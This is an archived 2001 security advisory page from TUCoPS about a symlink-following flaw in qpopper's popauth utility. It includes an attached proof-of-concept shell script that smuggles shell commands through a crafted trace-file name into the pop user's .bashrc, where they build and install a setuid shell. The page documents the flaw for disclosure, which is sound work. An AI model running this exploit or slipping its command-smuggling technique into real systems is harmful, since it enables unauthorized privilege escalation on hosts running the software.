Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: unix4933.htm

popauth symlink problem

18th Dec 2001 [SBWID-4933]

	popauth symlink problem


	 current version of popauth (packaged with qpopper)


	Paul Starzetz reported following :

	there is a symlink problem in the popauth utility, which is part of  the
	qpoper package. The binary  is  often  istalled  suid  pop  and  follows
	symlinks in the -trace file option. This problem has  been  reported  to
	vendors in June 2001.

	Impact: in case of suid popauth  and  valid  shell  for  user  pop,  the
	attached script will create suid-pop shell, if someone su to  pop.  This
	may happen as a part of some automated check script (startup script).

	This vulnerability is not very crucial, however it  should  be  reported
	at least once.






	Content-Type: application/x-sh;


	Content-Transfer-Encoding: 7bit

	Content-Disposition: inline;





	# popauth symlink follow vuln by IhaQueR

	# this will create .bashrc for user pop

	# and ~pop/sup suid shell


	FILE=$(perl -e \'print \"/tmp/blah1\\\"\\ncd ~\\necho >blah.c \\\"#include <stdio.h>\\nmain(){setreuid(geteuid(),getuid());execlp(\\\\\\\"bash\\\\\\\", \\\\\\\"bash\\\\\\\",NULL);}\\\"\\ngcc blah.c -o sup\\nchmod u+s sup\\necho done\\n\\n\\\"\"\')


	ln -s /var/lib/pop/.bashrc \"$FILE\"


	/usr/sbin/popauth -trace \"$FILE\"





	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH